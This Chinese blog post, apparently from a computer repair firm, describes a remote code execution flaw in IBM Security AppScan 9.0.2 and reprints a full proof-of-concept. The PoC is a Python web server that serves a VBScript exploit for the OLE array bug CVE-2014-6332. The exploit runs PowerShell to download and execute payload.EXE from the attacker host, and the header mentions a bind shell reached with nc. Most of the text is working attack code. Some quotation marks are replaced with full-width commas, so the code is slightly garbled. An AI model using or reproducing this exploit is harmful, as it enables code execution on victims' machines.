IBM Security AppScan 9.0.2远程代码执行漏洞（含POC）

 IBM Security AppScan Standard是美国IBM公司的一套Web应用的安全测试工具。该工具可在应用开发生命周期中进行自动化动态和静态安全漏洞扫描。该漏洞基于Windows OLE自动化数组远程代码执行漏洞，远程攻击者可利用此漏洞执行任意代码。

视频演示

漏洞POC

#!/usr/bin/python  import BaseHTTPServer, socket  ## # IBM Security AppScan Standard OLE Automation Array Remote Code Execution # # Author: Naser Farhadi # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 # # Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7 # # Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/  # if you able to exploit IE then you can exploit appscan and acunetix ;) # This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And # Metasploit windows/shell_bind_tcp Executable Payload # # Usage: #       chmod +x appscan.py #       ./appscan.py # # Video: http://youtu.be/hPs1zQaBLMU       ... #       nc 172.20.10.14 333 ##  class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):     def do_GET(req):         req.send_response(200)         if req.path == "/payload.EⅩE":             req.send_header(，Content-type，, ，application/exe，)             req.end_headers()             exe = open("payload.EⅩE", ，rb，)             req.wfile.write(exe.read())             exe.close()         else:             req.send_header(，Content-type，, ，text/html，)             req.end_headers()             req.wfile.write("""Please scan me!                                                          function runmumaa()                              On Error Resume Next                             set shell=createobject("Shell.Application")                             command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile(，http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.EⅩE，,\                             ，payload.EⅩE，);$(New-Object -com Shell.Application).ShellExecute(，payload.EⅩE，);"                             shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0                             end function                              dim   aa()                             dim   ab()                             dim   a0                             dim   a1                             dim   a2                             dim   a3                             dim   win9x                             dim   intVersion                             dim   rnda                             dim   funclass                             dim   myarray                              Begin()                              function Begin()                               On Error Resume Next                               info=Navigator.UserAgent                                if(instr(info,"Win64")>0)   then                                  exit   function                               end if                                if (instr(info,"MSIE")>0)   then                                           intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))                                  else                                  exit   function                                                                           end if                                win9x=0                                BeginInit()                               If Create()=True Then                                  myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)                                  myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)                                   if(intVersion<4) then                                      document.write("
 IE")                                      document.write(intVersion)                                      runshellcode()                                                      else                                         setnotsafemode()                                  end if                               end if                             end function                              function BeginInit()                                Randomize()                                redim aa(5)                                redim ab(5)                                a0=13+17*rnd(6)                                a3=7+3*rnd(5)                             end function                              function Create()                               On Error Resume Next                               dim i                               Create=False                               For i = 0 To 400                                 If Over()=True Then                                 ，   document.write(i)                                         Create=True                                    Exit For                                 End If                                Next                             end function                              sub testaa()                             end sub                              function mydata()                                 On Error Resume Next                                  i=testaa                                  i=null                                  redim  Preserve aa(a2)                                                                   ab(0)=0                                  aa(a1)=i                                  ab(0)=6.36598737437801E-314                                   aa(a1+2)=myarray                                  ab(2)=1.74088534731324E-310                                    mydata=aa(a1)                                  redim  Preserve aa(a0)                               end function                                function setnotsafemode()                                 On Error Resume Next                                 i=mydata()                                   i=readmemo(i+8)                                 i=readmemo(i+16)                                 j=readmemo(i+&h134)                                   for k=0 to &h60 step 4                                     j=readmemo(i+&h120+k)                                     if(j=14) then                                           j=0                                                     redim  Preserve aa(a2)                                               aa(a1+2)(i+&h11c+k)=ab(4)                                           redim  Preserve aa(a0)                                     j=0                                            j=readmemo(i+&h120+k)                                                                                     Exit for                                        end if                                  next                                  ab(2)=1.69759663316747E-313                                 runmumaa()                              end function                              function Over()                                 On Error Resume Next                                 dim type1,type2,type3                                 Over=False                                 a0=a0+a3                                 a1=a0+2                                 a2=a0+&h8000000                                                                redim  Preserve aa(a0)                                  redim   ab(a0)                                                                     redim  Preserve aa(a2)                                                                type1=1                                 ab(0)=1.123456789012345678901234567890                                 aa(a0)=10                                                                        If(IsObject(aa(a1-1)) = False) Then                                    if(intVersion<4) then                                        mem=cint(a0+1)*16                                                     j=vartype(aa(a1-1))                                        if((j=mem+4) or (j*8=mem+8)) then                                           if(vartype(aa(a1-1))<>0)  Then                                                  If(IsObject(aa(a1)) = False ) Then                                                             type1=VarType(aa(a1))                                              end if                                                          end if                                        else                                          redim  Preserve aa(a0)                                          exit  function                                         end if                                      else                                        if(vartype(aa(a1-1))<>0)  Then                                               If(IsObject(aa(a1)) = False ) Then                                               type1=VarType(aa(a1))                                           end if                                                        end if                                     end if                                 end if                                                                                                             If(type1=&h2f66) Then                                                Over=True                                       End If                                   If(type1=&hB9AD) Then                                       Over=True                                       win9x=1                                 End If                                    redim  Preserve aa(a0)                                                                            end function                              function ReadMemo(add)                                  On Error Resume Next                                 redim  Preserve aa(a2)                                                                  ab(0)=0                                    aa(a1)=add+4                                      ab(0)=1.69759663316747E-313                                        ReadMemo=lenb(aa(a1))                                                                   ab(0)=0                                                                   redim  Preserve aa(a0)                             end function                              """)  if __name__ == ，__main__，:     sclass = BaseHTTPServer.HTTPServer     server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)     print "Http server started", socket.gethostbyname(socket.gethostname()), 80     try:         server.serve_forever()     except KeyboardInterrupt:         pass     server.server_close()

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：